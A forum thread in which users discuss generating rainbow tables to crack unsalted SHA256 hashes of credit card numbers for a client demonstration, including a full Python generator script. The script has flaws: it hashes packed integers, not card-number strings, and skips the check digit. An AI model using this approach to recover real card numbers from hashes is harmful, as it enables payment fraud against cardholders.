Custom Rainbow Tables

[killbot9000]

Hey all, I'm looking to generate rainbow tables for a PoC. My client has decided that hashing (no salt) credit card numbers is a good idea. To prove him wrong I wrote a little script that will crack the SHA256 hash iteratively, but with a 9 digit account number (6 digit known bank bin + account number + check digit = 16 digit card number), this obviously takes a very long time.

To make the PoC more demonstrative, I'd like to gen some custom rainbow tables. I have the first 6 digits, and obviously the last digit will be a check digit. What is the best way to generate these tables?

Ive looked at winrtgen and rainbowcrack, but neither gives me the option to prefix the first 6 digits, much less generate the check digit. Any help would be greatly appreciated!

[Infiltrator]

I don't think there is a solution out there, that will allow you to generate rainbow tables for this purpose.

The only way to make it work, would be writing a custom code that can generate the numbers you want and then have them saved into a text file.

[Alias]

The number of unknowns you have is only 10 right?

And assuming they are all numbers howsecureismypassword.net guesses that it would take a modern PC 40 seconds.

If I get interested enough I may write some Python code to do it.

[Alias]

Well I wrote some code to generate the Rainbow tables, each entry uses 40 bytes total. 8 bytes for the unencrypted cc numbers, and 32 bytes for the sha256 hash.

Working it out though, just generating for a single bank branch number it will take around 350GB of space.

40b * 9999999999 = 399999999960b

399999999960b / 1024 = 390624999.9609375k

390624999.9609375k / 1024 = 381469.726524353M

381469.726524353M / 1024 = 372.529029809G

Total: 372.529029809 Gigabytes

If you have any ideas of how to store the information in a smaller space, let me know.

Not to mention compute time, it took me around a minute to get to 0.000255790000026%, then again my computer is fairly slow.

You could try various options for speeding it up.

1. Rewrite in C or Assembly
   
2. Modify Pyrit to generate your hashes instead.
   

The code below is fairly simple to use, I'm sure you can figure out how to use it on your own. I left implementing the searcher up to you. Although if you do need help, don't hesitate to ask.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#       rtgen.py
#       
#       Copyright 2011 Alias <mali0037@gmail.com>
#       
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#       
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#       
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
#       
#       

# Perform imports
import sys, time, hashlib, struct, math


# Makes sure that the bankNum is always 10 digits
def convertK(k):
	size = len(str(k))
	if(size < 10):
		k = ("0" * (10 - size)) + str(k)
	return k

# Generates the SHA256 hashes and writes to a file
def genTable(bankNum):
	# Convert bankNum to certain forms
	bankNum_int = int(bankNum)
	bankNum_str = str(bankNum)

	# Open the file
	fp = open("bank" + bankNum_str + ".rt", "wb")

	# Main loop
	for k in range(9999999999):
		# Concatenates the banknumber and the accunt number
		string = bankNum_str + convertK(k)

		string_int = int(string)

		# Convert bankNum to a C integer in bytes
		string_bytes = struct.pack('q', string_int)

		# Encrypt the string
		encryptedString = hashlib.sha256(string_bytes)

		# Write everything to a file
		fp.write(string_bytes)
		fp.write(encryptedString.digest())

		# Print the output
		percentage = k / 9999999999
		if((k % 100) == 0):
			print(string, ":  ", encryptedString.hexdigest(), "\t", percentage, "% Complete", sep = '')

	return 0

def main():
	genTable(sys.argv[1])

	return 0


if __name__ == '__main__':
	main()